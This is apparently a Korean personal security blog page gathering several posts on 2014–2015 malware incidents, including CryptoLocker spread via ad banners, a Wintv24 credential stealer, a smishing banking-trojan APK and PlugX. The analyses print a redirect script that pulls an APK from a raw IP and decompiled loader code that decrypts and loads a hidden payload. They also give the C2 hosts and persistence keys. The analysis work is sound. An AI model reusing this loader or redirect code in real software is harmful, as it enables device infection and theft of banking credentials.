'알약'에 해당되는 글 116건






국내 최대 규모의 휴대폰 커뮤니티 뽐뿌(PPOMPPU) 사이트가 개인정보 약 190만건이 해킹 된 사실이 2015-09-141일 확인되었다.


이번 해킹의 원인은 국내인으로 추정되는 해커에 의해 제로보드 취약점을 이용한 SQL Injection 공격으로 발생되었다고 한다.


이 공격으로 인해 유출 된 개인정보는 아래와 같다.

"회원 정보 ID, 닉네임, 암호화 된 비밀번호, 생년월일, 이메일 주소, 암호화 된 장터 비밀번호, 회원 가입일, 회원 점수


이번 뿜뿌 해킹사건에는 개인정보 뿐만 아니라 이번 해킹으로 인해 악성 어플리케이션(APK)가 추가로 다운로드 되는 

내용도 존재했다.


관련 내용들은 아래의 링크에 자세하게 설명되어 있으니 참고하자^^



□ 뽐뿌 개인정보 유출 관련 내용


현재 뽐뿌에서는 홈페이지에 유출에 관한 공지사항을 팝업으로 알려주고 있다.



블로그 이미지

잡다한 처리

이것 저것 끄적여 보는 공간으로 만들었습니다.



2015년 8월 19일 마이크로소프트의 MS15-093 긴급 업데이트 가 발표되었다.


긴급 업데이트 내용은 Microsoft Internet Explorer 7, 8, 9, 10, 11 웹 브라우저에서 새로운 메모리 손상 취약점(CVE-2015-2502)을 

통한 원격코드 실행이 가능한 보안 취약점에 대한 패치이다.


특히 MS15-093 보안패치에 대한 메모리 손상 취약점(CVE-2015-2502)에 대한 악성코드도 활동 중이니

꼭 긴급 업데이트를 받길 바란다.


※ 아래의 링크를 클릭하면 해당 취약점에 대한 정보를 볼 수 있다.

1. MS15-093 (긴급) : Internet Explorer용 보안 업데이트(3088903)


이 보안 업데이트는 Internet Explorer의 취약성을 해결합니다. 사용자가 Internet Explorer를 사용하여 특수 제작된 웹 페이지를 볼 경우 이 취약성으로 인해 원격 코드 실행이 허용될 수 있습니다. 이 취약성 악용에 성공한 공격자는 현재 사용자와 동일한 사용자 권한을 얻을 수 있습니다. 시스템에 대한 사용자 권한이 적게 구성된 계정의 고객은 관리자 권한으로 작업하는 고객에 비해 영향을 적게 받습니다.


이 보안 업데이트의 심각도는 영향받는 Windows 클라이언트의 Internet Explorer 7(IE 7), Internet Explorer 8(IE 8), Internet Explorer 9(IE 9), Internet Explorer 10(IE 10) 및 Internet Explorer 11(IE 11)에 대해 긴급이며 영향받는 Windows 서버의 Internet Explorer 7(IE 7), Internet Explorer 8(IE 8), Internet Explorer 9(IE 9), Internet Explorer 10(IE 10) 및 Internet Explorer 11(IE 11)에 대해 보통입니다. 자세한 내용은 영향받는 소프트웨어 절을 참조하십시오.


이 보안 업데이트는 Internet Explorer가 메모리의 개체를 처리하는 방식을 수정하여 취약성을 해결합니다.


영향을 받는 소프트웨어 :

- Internet Explorer 7

- Internet Explorer 8

- Internet Explorer 9

- Internet Explorer 10

- Internet Explorer 11

(Windows10 브라우저인 Edge 브라우저는 영향 받지 않습니다.)


취약점 : 

- 메모리 손상 취약점 (CVE-2015-2502)



※ 악성코드가 확인 된 보안 업데이트이기 때문에 꼭 패치하시길 바란다!!




블로그 이미지

잡다한 처리

이것 저것 끄적여 보는 공간으로 만들었습니다.




2015년 4월 21일 금일 새벽부터 국내 커뮤니티 사이트인 클리앙에서 악성코드 유포가 있었다.

클리앙측 이야기로는 새벽 01:38분부터 오전 11:12까지 유포가 진행 되었다고 한다.



설치 된 악성코드는 사용자의 문서, 그림, 동영상들을 강제로 암호화 시켜 암호화 해제를 빌미로 돈을 뜯어대는 

랜섬웨어(Ransomware)의 일종으로 Crypt0L0cker(크립토락커) 라는 악성코드로 확인되었다.


크립토락커 랜섬웨어는 이전에도 존재하였지만, 이번이 이슈가 되는 이유는 한글화 작업을 통해 

국내 드라이브 바이 다운로드(Drive-By-Download) 경로를 이용하고 있다는 것이다.


이를 통해 기존의 국내에서 많이 사용되고 있는 SweetOrange Exploit Kit 이나 CK Exploit Kit 도

랜섬웨어를 다운로드 시킬 가능성이 매우 높아졌다.


유포 경로는 클리앙 사이트에 올려진 외부 배너링크를 통해 악성 URL이 넘어 온 것으로 보인다.

클리앙 사이트는 아래 그림과 같이 "메인상단, 우상단, 게시판상단" 총 3개의 외부 배너를 가지고 있었다.


이 중 어떤 곳에서 악성 URL을 연결시켰는지는 알 수 없지만, 외부 광고 배너를 통해 악성URL 이 유포 된 것은 맞는 듯 하다.

(※ 현재는 모든 외부 배너를 삭제 한 상태이다)

(그림 출처 : 클리앙 광고 안내 페이지 http://www.clien.net/cs2/bbs/board.php?bo_table=notice&wr_id=8709)



현재까지 확인 된 내용으로는 아래와 같은 링크와 같은 URL들이 확인 되었다.

(아직 확실한 사실이 아니니 너무 신뢰하진 말자!!)

- 클리앙 외부 배너 광고 서버 URL (아직 미확인)

 ㄴ hxxp://medbps.filmwedding.ro/lrvqdg2.html


hxxp://medbps.filmwedding.ro/lrvqdg2.html

 ㄴ 해당 웹 파일에서 frame 태그를 이용하여 악성 URL로 넘기는 것으로 보인다.


<frameset rows="100%">

<frame src="hxxp://row.bottomwebsites.xyz/bewilders_urchin_platters_valid/17372163791826990">...</frame>



클리앙 크립토락커에 관련되어 개인 보안 블로그 및 보안업체 블로그에도 글이 하나씩 올라오고 있다.


금일 클리앙 외부광고 배너를 통해 설치 된 크립토락커 악성코드의 행위는 아래와 같다.

- 파일 생성

C:\Windows\esihuzaw.exe (Alyac : Trojan.Ransom.cryptolocker)


- 레지스트리 생성

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

"ipumjvuc" = "C:\WINDOWS\esihuzaw.exe"


- 파일 암호화

아래의 확장자를 제외한 모든 파일들을 암호화 알고리즘(RSA-2048)을 이용하여 "원본파일명.encrypted" 로 변경한다. 

(ex : 겨울.jpg.encrypted)

*.chm, *.ini, *.tmp, *.log, *.url, *.lnk, *.cmd, *.bat, *.scr, *.msi, *.sys, *.dll, *.exe


감염 된 PC에서는 아래와 같은 화면등을 볼 수 있다.




이후 암호화 해제를 위해 해독 프로그램을 구입하라는 창도 볼 수 있다.


크립토락커 악성코드에 감염이 되면 악성코드 자체는 삭제가 가능하지만,
암호화 된 파일들은 특정 암호키가 없으면 복구가 불가능 하다.

제작자에게 약 43만원 정도의 금액을 입금하면 암호키를 줄 수도 있겠지만, 무모한 도전은 안하는 것이 좋겠다.

현재 대부분의 보안업체에서 해당 파일을 탐지하고 있으니 사용하는 보안 프로그램을 최신 업데이트로 유지하고
실시간 감시를 켜두는 것이 좋다.


블로그 이미지

잡다한 처리

이것 저것 끄적여 보는 공간으로 만들었습니다.





이스트소프트(ESTsoft)에서 개발 한 국내 무료백신 프로그램 알약(ALYac)바이러스 토탈(VirusTotal) 사이트에 

새롭게 추가되었다.


엔진 추가까지 고생하신분들께 감사의 말씀을...참잘했어요



- 바이러스 토탈 블로그 원문 보기 : http://blog.virustotal.com/2014/11/virustotal-alyac.html

We welcome ESTsoft ALYac engine to VirusTotal. This South Korean multi-engine antivirus includes its own engine called Tera plus the popular BitDefender engine. In the words of the company:

"ALYac provides differentiated service with the award winning Triple-Engines.
The ESTsoft's Tera Engine, the BitDefender Engine and the Sophos Engine establish several protection layers.

With the lightweighted engine and the memory optimization, ALYac minimizes its resource usage.
Moreover, ALYac boasts excellent detection power against variant malicious files through 'Smart Scan Technology'."


https://www.virustotal.com/ko/file/c046cdf42816d711faaf120e6f70c5a29e146595baff204e13727c4bf3c8ff29/analysis/1417052511/



블로그 이미지

잡다한 처리

이것 저것 끄적여 보는 공간으로 만들었습니다.




국내에서 운영중인 스포츠 배팅 정보 및 동영상을 제공하는 윈티비24(Wintv24)에서 사이트 변조로 인한 악성코드가 유포되었다.


해당 사이트는 9월 13일부터 악성코드를 배포 하고 있었으며, 아래와 같은 스크립트를 통해 사용자에게 악성파일이 다운로드되어

설치되고 있었다.

hxxp://www.wintv24.com/data/win.htm (9월 13일)

ㄴhxxp://www.wintv24.com/data/win_24.exe


hxxp://www.wintv24.com/data/file/notice/win.htm (9월 16일 ~ 17일)

ㄴhxxp://www.wintv24.com/data/file/notice/win_24.exe


hxxp://www.wintv24.com/data/file/laddder/win.htm (9월 18일)

ㄴhxxp://www.wintv24.com/data/file/laddder/win_24.exe


hxxp://www.wintv24.com/data/file/notice/win.htm (9월 19일)

ㄴhxxp://www.wintv24.com/data/file/notice/vv3.exe


hxxp://bit.ly/1v0CroF (9월 20일)

ㄴhxxp://sniffer1.ddns.info/lsk.js

 ㄴhxxp://sniffer1.ddns.info/win.htm

 ㄴhxxp://sniffer1.ddns.info/wintv_update.exe


※ 모든 링크가 삭제되어 Full URL 공개



윈티비24(Wintv24)와 관련 된 내용은 아래 링크에서 자세하게 확인 할 수 있다.



스크립트를 통해 사용자에게 설치 되는 악성파일의 행위는 아래와 같다.

- 파일 생성

C:\Windows\Winpcapture.exe (Alyac : Spyware.Infostealer.Win24)


- 레지스트리 생성

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

"Shell" = "Explorer.exe C:\Windows\Winpcapture.exe"


HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{4f645220-306d-11d2-995d-00c04f98bbc9}

"StubPath" = "C:\WINDOWS\Winpcapture.exe"


- 서버 접속

sniffer1.ddns.info(103.1.249.204:80)


- 보안프로그램 종료

아래와 같은 경로의 보안프로그램 Uninstall 기능을 통해 삭제 시킨다.

C:\Program Files\AhnLab\V3Lite30\Uninst.exe

C:\Program Files\ESTsoft\ALYac\unins000.aye



이외에도 악성 파일이 설치 된 후 윈티비24(Wintv24) 사이트에서 로그인을 할 시 사용자 계정과 암호를 탈취 한다.

(※ 테스트 시 ID는 testadmin, Password는 1212를 사용하였다.)


사이트에서 로그인을 시도 할 시 아래와 같이 Base64로 암호화 하여 자기 서버로 전달 시킨다.


Base64 암호화 내용은 Malziila 프로그램을 사용하여 디코딩 시 아래와 같이 사용자 정보(ID/Pass)를 가져간 것을 알 수 있다.


제작자가 사용한 서버(sniffer1.ddns.info)는 일본에 위치 한 것으로 파악 된다.


해당 서버에 접속을 해보니, "Merong~~~~:p" 라는 문구가 들어온다.

이런 ㅅㅂㄴㅇㅅㄲ !!


또 한가지 확인 된 사실은, 

윈티비24(Wintv24) 사이트에서 정상적인 로그인 시 암호화도 하지 않고 바로 서버로 사용자 정보를 넘겨주고 있었다.

(차라리 악성코드 제작자가 웹사이트를 맡는 편이...;; 그래도 악성코드 제작자는 Base64로 암호화라도 했음 ㅋㅋ)

POST /bbs/login_check.php HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*

Referer: http://wintv24.com/bbs/login.php

Accept-Language: ko

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Host: wintv24.com

Content-Length: 69

Connection: Keep-Alive

Cache-Control: no-cache

Cookie: PHPSESSID=pcatf8bpcsqs3d14b6v9l2lt82; f33d2ed86bd82d4c22123c9da444d8ab=MTQxMTM2NjYzOA%3D%3D; 

2a0d2363701f23f8a75028924a3af643=MTEyLjIxNy4yMDUuMTU0; 96b28b766b7e0699aa91c9ff3d890663=aHR0cDovL3dpbnR2MjQuY29tLw%3D%3D


url=%252Fbbs%252Flogin.php&mb_id=testadmin&mb_password=1212&x=17&y=32




* 악성파일 실행 후 부팅이 안되는 정보 추가

악성파일이 실행 된 후 재부팅을 하게 되면, 레지스트리의 버그로 인하여 OS 부팅이 불가능하게 된다.


재부팅이 되면 아래와 같은 화면이 지속적으로 보여주며, 정상적인 부팅이 이루어지지 않는다.

(해당 스크린샷은 Windows XP에 대한 화면이다)



이를 해결 하기 위해서는 안전모드(네트워크 사용)을 통해 부팅 하여 아래의 파일을 다운로드 후 돌려주시면 된다.

안전모드로 접근하는 방법은 [Tip]안전모드로 부팅하기 를 통해 쉽게 할 수 있다.


해결 방법은 Windows XPWindows 7 방법이 있으니, 각자 자신의 OS에 맞게 치료하면 된다.

■ 윈티비24(Wintv24) 악성코드 Winpcapture.exe 치료 방법 (Windows XP 전용) ■ 


Auto Cure.bat



1. 안전모드 부팅 후 아래의 파일을 다운로드 한다.

http://kjcc2.tistory.com/attachment/cfile3.uf@243458485420C02407CB34.bat


2. 파일 실행


3. 재부팅



■ 윈티비24(Wintv24) 악성코드 Winpcapture.exe 치료 방법 (Windows 7 전용) ■ 


Windows 7은 안전모드 부팅 시 "안전모드(네트워크 사용)"으로 접근 시 부팅이 안되기 때문에

"안전모드(명령 프롬프트)" 로 접속해서 아래의 명령어들을 사용하여 사용자가 직접 입력해야 한다.



부팅이 되면 아래와 같은 명령 프롬프트 모드에서 아래의 명령어를 치고, 재부팅 하면 된다.


1. 파일 삭제

del C:\Windows\Winpcapture.exe


2. 레지스트리 삭제 및 수정(각각 1개씩 다 입력해야 한다)

reg delete "HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{4f645220-306d-11d2-995d-00c04f98bbc9}" /v "StubPath" /f


reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /f


reg add  "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t "REG_SZ" /d "explorer.exe" /f


3. 재부팅

shutdown -r -f -t 0


블로그 이미지

잡다한 처리

이것 저것 끄적여 보는 공간으로 만들었습니다.






지난 6월 18일경 2014년 브라질 월드컵 관련 스미싱 문구들이 발견되어서 포스팅을 준비하다가 이상한 APK 파일을 보게 되었다.


분석을 다 하고 나니, 비슷한 경우가 이전에도 있었던것으로 보인다.

(이전에는 "ypt.db" 파일이 아닌 "ds" 파일로 유포가 되었던거 같다.)


아래의 내용은 실제 브라질 월드컵 스미싱 문자를 수신받은 문자 내용이다.

- 브라질 월드컵 거리응원 ‘무한도전’이간다 함께 참여합시다 sbsfune.krsbs.com

- 월드컵 거리응원 교통통제 미리체크 확인 sbsfune.krsbs.com

- 브라질 월드컵 거리응원장소 어디 일까요?응원장소 확인 sbsfun.krsbs.com


※ 현재는 링크가 모두 차단되어 Full URL 공개!!



링크를 따라가보니, 이것도 좀 귀찮은 형태로 APK 파일을 다운로드를 시키고 있었다.

<script type="text/javascript">

 var browser =

 {

   versions: function ()

   {

     var u = navigator.userAgent, app = navigator.appVersion;

     return

     {

       ios: !!u.match(/\(i[^;

       ]+;

       ( U;

       )? CPU.+Mac OS X/),

       android: u.indexOf('Android') > -1 || u.indexOf('Linux') > -1,

       iPhone: u.indexOf('iPhone') > -1,

       iPad: u.indexOf('iPad') > -1,

     };

   }

   (),

 }

 if (browser.versions.android)

 {

   window.location.href = "http://126.15.84.44/play.apk";

 }

 </script>


Navigator 객체의 속성

  - appCodeName : 브라우저의 코드명을 반환

  - appName : 현재 사용중인 브라우저의 이름을 반환

  - appVersion : 현재 사용중인 브라우저의 버전을 반환

  - userAgent : 브라우저의 이름, 버전, 코드를 포함하는 문자열을 반환

  - minetype : mine 형식의 정보를 반환(오브젝트)

  - plugins : plugin 정보를 반환(오브젝트)

  - language : 현재 브라우저가 사용하는 언어를 반환. 익스플로러에서는 지원하지 않음

  - platform : 사용중인 시스템 코드를 반환. 윈도 95/98/NT는 Win32를 반환


* 코드 분석

사용자의 브라우저 정보를 통해 안드로이드 일 때만 play.apk 파일을 자동으로 다운로드 시킴



위의 스크립트는 이전에 확인하였던 Mobile User Agent 구분을 통해 리다이렉션 시키는 스크립트이다.


단지 틀린점이라곤 Android 뿐만아니라, MAc, Linux, iPhone, iPad까지 확인을 한다는 점이다.



암튼 이렇게 해서 결론적으로 play.apk를 다운로드 받게 된다.

다운로드 받은 play.apk 파일은 보기에는 지극히 정상적인(?) 악성파일로 보였다.



dex분석을 위해 dex2jar를 이용하여 classes.dex 파일을 디컴파일 했다.



그런데 악성행위는 없고, "android.content.res.AssetManager" 를 이용하여 assets 폴더의 파일을 읽는 부분이 눈에 보였다.

private Resources getResource()

  {

    Resources localResources1 = null;

    try

    {

      Class localClass = Class.forName("android.content.res.AssetManager");

      Object localObject = localClass.newInstance();

      Method localMethod = localClass.getDeclaredMethod("addAssetPath", new Class[] { String.class });

      Object[] arrayOfObject1 = new Object[1];

      arrayOfObject1[0] = this.apkFileName;

      localMethod.invoke(localObject, arrayOfObject1);

      localResources1 = getBaseContext().getResources();

      Class[] arrayOfClass = new Class[3];

      arrayOfClass[0] = localClass;

      arrayOfClass[1] = localResources1.getDisplayMetrics().getClass();

      arrayOfClass[2] = localResources1.getConfiguration().getClass();

      Constructor localConstructor = Resources.class.getConstructor(arrayOfClass);

      Object[] arrayOfObject2 = new Object[3];

      arrayOfObject2[0] = localObject;

      arrayOfObject2[1] = localResources1.getDisplayMetrics();

      arrayOfObject2[2] = localResources1.getConfiguration();

      Resources localResources2 = (Resources)localConstructor.newInstance(arrayOfObject2);

      return localResources2;

    }

    catch (Exception localException)

    {

      localException.printStackTrace();

    }

    return localResources1;

  }



그래서 assets 폴더를 들어가봤다.

assets 폴더에 "ypt.db" 파일이 존재했다.



그럼 ypt.db 파일이 무슨 역활을 하는지 한번 에디터 프로그램을 통해 확인했더니, 뭔가 암호화 된 파일로 보였다.



그래서 다시 디컴파일 된 classes.dex 파일을 확인해 봤다.

역시 ypt.db 파일을 가지고 노는 부분이 확인됬다.


코드 상, ypt.db 파일을 DES 암호화 방식을 통해 "gjaoun" 키값을 통해 복호화하여 x.zip 라는 파일로 저장하는 것을 확인하였다.

private void loadClass(Context paramContext)

  {

    String str1 = "/data/data/" + paramContext.getPackageName() + "/";

    this.apkFileName = ("/data/app/" + paramContext.getPackageName() + "-1.apk");

    String str2 = str1 + "x.zip";

    String str3 = str1 + "x";

    try

    {

      InputStream localInputStream = getAssets().open("ypt.db");

      Log.v("cmd", "get Input Ok");

      int i = localInputStream.available();

      Log.v("cmd", "数据大小:" + i);

      byte[] arrayOfByte1 = new byte[i];

      localInputStream.read(arrayOfByte1, 0, i);

      byte[] arrayOfByte2 = new DesUtils("gjaoun").decrypt(arrayOfByte1);

      FileOutputStream localFileOutputStream = new FileOutputStream(str2);

      localFileOutputStream.write(arrayOfByte2);

      localFileOutputStream.close();

      Log.v("cmd", "ds数据读取完毕");

      try

      {

        this.localDexFile = DexFile.loadDex(str2, str3, 0);

        this.localEnumeration = this.localDexFile.entries();

        if (!this.localEnumeration.hasMoreElements())

        {

          Log.v("cmd", "删除文件");

          new File(str2).delete();

          new File(str3).delete();

        }

        Log.v("cmd", "加载类");

        while (true)

        {

          if (!this.localEnumeration.hasMoreElements())

            return;

          this.localDexFile.loadClass((String)this.localEnumeration.nextElement(), paramContext.getClassLoader());

        }

      }

      catch (IOException localIOException)

      {

        localIOException.printStackTrace();

        Log.v("cmd", "IOException:" + localIOException.getMessage());

        return;

      }

    }

    catch (Exception localException)

    {

      localException.printStackTrace();

      Log.v("cmd", "Exception:" + localException.getMessage());

    }

  }


  protected void attachBaseContext(Context paramContext)

  {

    Log.v("cmd", "here");

    super.attachBaseContext(paramContext);

  }


* DES(Data Encryption Standard)

블록 암호의 일종으로, 미국 NBS (National Bureau of Standards, 현재 NIST)에서 국가 표준으로 정한 암호이다. DES는 대칭키 암호이며, 56비트의 키를 사용한다. 


EFF에서 제작한 DES 무차별 대입 공격 하드웨어.

DES는 현재 취약한 것으로 알려져 있다. 56비트의 키 길이는 현재 컴퓨터 환경에 비해 너무 짧다는 것이 하나의 원인이며, DES에 백도어가 포함되어 있어 특수한 방법을 사용하면 정부 기관에서 쉽게 해독할 수 있을 것이라는 주장도 제기되었다. 1998년에 전자 프론티어 재단(EFF)에서는 56시간 안에 암호를 해독하는 무차별 대입 공격 하드웨어를 만들었으며, 1999년에는 22시간 15분 안에 해독하는 하드웨어를 만들었다.


DES를 세 번 반복해서 사용하는 Triple-DES는 DES에 비해 안전한 것으로 알려져 있으며, 또한 현재는 DES 대신 AES(Advanced Encryption Standard)가 새 표준으로 정해져 사용되고 있다


출처 : http://ko.wikipedia.org/wiki/DES_(%EC%95%94%ED%98%B8)



나는 개발을 잘 못하니, 사내 개발자에게 복호화 루틴을 부탁해서 생성 된 x.zip 파일을  확인했다.

다른 파일들은 없고 안에는 classes.dex 파일 하나만 존재했다.



그럼 다시 dex2jar 를 통해 디컴파일을 한 후 다시 분석을 시도해보았다.

그랬더니 처음에는 보이지 않았던 악성행위에 대한 코드들이 주루륵 보였다.



결론적으로 play.apk 파일은 국내 인터넷 뱅킹(농협, 신한은행, 우리은행, 국민은행, 하나은행)의 개인정보를 노리는 

KRBanker 종류의 악성파일이다.


추가적으로 다운로드 주소는 아래와 같다.

hxxp://126.15.84.44/N.apk

hxxp://126.15.84.44/S.apk

hxxp://126.15.84.44/W.apk

hxxp://126.15.84.44/K.apk

hxxp://126.15.84.44/H.apk


또한 알약에서는 해당 파일을 Trojan.Android.KRBanker 로 탐지 중이다.


블로그 이미지

잡다한 처리

이것 저것 끄적여 보는 공간으로 만들었습니다.


무료 백신 알약(ALYac) 제품으로 유명한 이스트소프트(ESTsoft)에서 취약점 공격 차단 솔루션 제품을 출시했다.


출시 된 제품은 총 2가지로 제품명은 아래와 같다.

■ 윈도우 취약점을 빈틈없이 막아주는 보안 솔루션 - 알약 익스플로잇 쉴드(Alyac Exploit Shield)

 산업용 시스템(POS, ATM 등) 전용 보안 솔루션 - 알약 레거시 프로텍터(Alyac Legacy Protector) : 유료제품


2014년 4월 8일 윈도우 XP(Windows XP) 보안 업데이트 지원이 종료됨에 따라 각종 취약점 문제를 해결하기 위해 만들어진 
프로그램으로써, 알약 익스플로잇 쉴드는 각종 브라우저 및 소프트웨어 취약점을 방어할 수 있고,
알약 레거시 프로텍터는 POS, ATM 등 XP를 사용중인 산업용 기기를 방어할 수 있는 프로그램이다.


□ 관련 내용



해당 제품들은 아래의 홈페이지에서 다운로드 후 사용이 가능하다.


- 알약 익스플로잇 쉴드(Alyac Exploit Shield) : http://alyac.altools.co.kr/Public/Alyac/ExploitShield.aspx



- 알약 레거시 프로텍터(Alyac Legacy Protector) : http://alyac.altools.co.kr/Enterprise/Product/AlyacLegacy.aspx



자세한 프로그램 설명은 차후에 다시^^
 

블로그 이미지

잡다한 처리

이것 저것 끄적여 보는 공간으로 만들었습니다.



국내 보안업체인 [안랩(Ahnlab)]에서 스미싱 메시지를 통해 개인정보 유출 사건사고가 많이 발생하면서 이를 차단할 수 있는
무료 어플리케이션을 새롭게 공개했다.


안랩의 안전한 문자는, 악성 URL이 포함 된 문자를 탐지하여 스미싱 메시지인지 확인하는 기능과, 스마트폰으로 URL 클릭 시
접속 하기 전 악성유무를 판단한다. 또한 알 수 없는 소스 허용에 대해 활성화 여부를 체크해주는 어플리케이션이다.

이 외에도 스미싱 메시지를 탐지 할 수 있는 어플리케이션은 본 블로그에 소개 된 것들만 나열해본다.


다운로드는 아래의 링크에서 받으면 되며, 스미싱으로 고생하는 분들은 한번 설치해보시기 바란다.


- 구글 플레이 사이트 : https://play.google.com/store/apps/details?id=com.ahnlab.safemessage

‘AhnLab 안전한 문자’는 스마트폰 사용자를 위협하는 스미싱 메시지를 탐지하여 피해를 미연에 방지 할 수 있도록 무료 배포되는 모바일 보안 애플리케이션입니다.
 

스미싱(Smishing)이란?

문자메시지(SMS)와 피싱(phishing)의 합성어로, 인터넷 접속이 가능한 스마트폰 사용자를 대상으로 문자 메시지에 포함된 URL에 접속을 유도하고 악성코드를 설치하여 귀중한 사용자의 정보를 가로채 무단 결제 피해를 주는 신종 사기 수법입니다.

최근 믿을 수 있는 기업 또는 지인의 전화번호로 발신 번호를 조작하여 수신자가 URL을 클릭하도록 유도하여 악성코드를 설치하는 수법이 기승을 부리고 있습니다. 업체 또는 지인과 연관성이 없는 메시지 내용에 대해서는 세심한 주의가 필요하며,
특히 URL을 포함한 문자는 함부로 접속 하지 않도록 주의하시기 바랍니다.


AhnLab은 2001년부터 모바일 플랫폼을 사용하는 단말기의 보안 솔루션을 공급해 왔으며, 오랜 경험과 전문성을 바탕으로 모바일 생태계의 보호에 힘쓰고 있습니다.


< 유의 사항 >

- 이 애플리케이션은 가볍고 빠르게, 스마트폰의 성능 저하가 전혀 없이 실행 되도록 설계 되었습니다.

- 스마트폰 기종에 따라 MMS(멀티미디어 메시지)의 실시간 감시도 지원합니다.

- 스마트폰에 설치되어 있는 ‘V3 Mobile 2.0’ 또는 모바일 백신을 통해 항상 최신 엔진 업데이트 및 주기적인 검사를 권장 합니다.

- 일부 스마트폰의 특성에 따라 메시지 탐지가 되지 않을 수도 있으므로, URL 접속 시에는 항상 주의가 필요 합니다.


< 주요기능 >

* ‘AhnLab 안전한 문자’는 아래 3가지 감지 기능을 통해 스미싱의 위협 탐지를 상호보완 하도록 구성되어 있습니다.

* Android 2.2~4.x 버전 OS를 사용하는 스마트폰을 지원 합니다. (단, 전화 기능이 없는 플레이어 및 태블릿 PC는 지원 하지 않습니다.)


1) 악성 URL이 포함된 문자 메시지 탐지 기능

- URL이 포함된 문자 메시지(SMS/MMS)가 수신되면, URL 끝 단에 악성 앱이 다운로드 되는지 여부 판단 후

- 악성 앱을 감지하여 의심이나 악성코드가 있을 경우 사용자에게 위협을 알려 드립니다.

- 메시지 내 URL만 탐지하며, 수신 메시지 자체를 차단/삭제 하거나 메시지 내용을 무단으로 수집 하지 않습니다.

* 본 제품의 기본 기능으로 ‘기본 ON’ 설정이며, 환경설정에서 ON/Off 하실 수 있습니다.

* 앱 설치 후 최초 실행 시 실시간 문자 메시지 감지 활성화와 함께 기존 수신 문자 메시지 내 URL의 악성코드 유무를 검사 합니다.


2) 실시간 URL 링크 감지 기능

- 메시지, SNS 문자, 메모 등의 앱에서 URL을 통한 웹 접속이 발생 할 경우, 브라우저가 띄워지기 전에 접속하려는 URL 링크의 악성 앱 다운로드 유무를 탐지하여 위험이 있을 경우 알려드립니다.

* 부가적 안전장치로 ‘기본 Off’ 설정이며, 환경설정에서 본 앱을 ‘항상 사용’으로 설정 후 감지를 ON 하실 수 있습니다.


3) ‘알 수 없는 소스(출처) 허용 설정’ 여부 확인 기능

- Android 단말기의 환경설정 > 보안 내에 있는 "알 수 없는 소스(출처) 허용" 설정에 대한 체크 기능으로

- 악성 앱이 사용자의 의지와 무관하게 다운로드 후 설치/활성화 되어 악성코드에 감염되는 것을 막아주는 1차적 안전장치 입니다.

- ‘허용 설정’이 체크 해제 되어 있어야(unchecked), 구글 플레이 또는 통신사 공식 마켓이 아닌 인터넷 URL, USB 또는 단말기 내 특정 디렉토리에서의 애플리케이션 설치를 막을 수 있습니다.

* 본 제품의 기본 기능으로 ‘기본 Off’ 설정이며, 환경설정에서 ON/Off 하실 수 있습니다.


< 참고 >

※ 애플리케이션 '사용자 리뷰'에 남기시는 글에는 답변을 드리기 어렵습니다. ‘AhnLab 안전한 문자’에 대한 사용문의나 오류 발생 시, 휴대폰 기종/OS버전 및 상황 등 자세한 증상을 고객서비스팀(customer@ahnlab.com)으로 보내주시기 바랍니다.


- 개발자 연락처 :

customer@ahnlab.com



 

 
 
 
 
 
 
 
 
 



블로그 이미지

잡다한 처리

이것 저것 끄적여 보는 공간으로 만들었습니다.


조금 지난 이슈지만, 기록용으로 포스팅!!

이번에 확인 된 악성코드는 국내 기업쪽에서 많이 발견되는 PlugX 악성코드로 아주 전형적인 사용자 정보 탈취 악성코드이다.

최초 유포는 명확하게 확인되지는 않았지만, 케이엠플레이어(KMPlayer)동작 시 새로운 버전이 업데이트 되었다고 허위 알림창이
사용자에게 보여지고 사용자는 이를 믿고 업데이트 파일을 다운로드 받아 실행 된 것으로 추측된다고 한다.


그럼 간단하게 파일을 살펴보자
우선 유포 된 파일은 "KMP_3.7.0.87.exe" 파일이름을 가지고 있으며 이는 실제 케이엠플레이어 배포파일명과 유사하다.
(참고로, 해당 유포 시 최신 업데이트 파일의 이름은 KMP_3.6.0.87.exe 이라고 한다.)


또한 이 파일은 정상적인 디지털서명을 통해 백신 프로그램의 탐지우회를 할 수 있도록 제작된 것으로 보인다.
(파수닷컴(Fasoo.com)의 디지털서명이 박혀 있는것이 영 찝찝하다;;)



자동압축해제(SFX : Self-extracting archive) 기능을 이용하여 사용자 PC에 악성파일을 자동으로 설치한다.
악성코드 제작자들이 참 좋아하는 방식 중 하나인듯;;



파일의 정보는 확인했고, 이제 생성되는 파일과 레지스트리 그리고 간단한 동작원리를 알아보자.

- 파일 생성 위치
C:\Documents and Settings\All Users\OleView\ACLUI.DLL (암호화 된 데이터 파일을 풀어주는 로더)
C:\Documents and Settings\All Users\OleView\ACLUI.DLL.UI (암호화 된 데이터 파일)
C:\Documents and Settings\All Users\OleView\NvSmart.hlp (키로깅 저장 파일)
C:\Documents and Settings\All Users\OleView\OleView.exe (정상파일)
C:\Documents and Settings\[사용자 계정]\Local Settings\Temp\time.exe (드롭퍼)

- 레지스트리 생성 위치
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\OleView

- 동작 원리
1) OleView.exe 파일이 실행되면 자신이 필요한 dll (C:\WINDOWS\system32\aclui.dll) 파일을 로드하게 되어있다. 하지만 기본적으로 윈도우라는 OS는 동일한 폴더에 있는 파일을 우선적으로 인식하기 때문에 C:\WINDOWS\system32\aclui.dll 파일이 아닌 동일 폴더에 있는 C:\Documents and Settings\All Users\OleView\ACLUI.DLL 파일을 로드한다.(정상적인 OleView.exe 프로그램은 실행되지 않는다)
2) 로드 된 ACLUI.DLL은 암호화 된 ACLUI.DLL.UI 파일을 찾아 로드시킨다.
3) ACLUI.DLL.UI 파일이 로드되면 암호화 된 내용을 재배치하여 악의적인 행위(키로깅) 시작
4) NvSmart.hlp 파일에 사용자가 입력 된 내용들을 저장 후 외부서버로 전송



알약에서는 이 파일을 "Bookdoor.PlugX.A" 로 탐지 중이다.



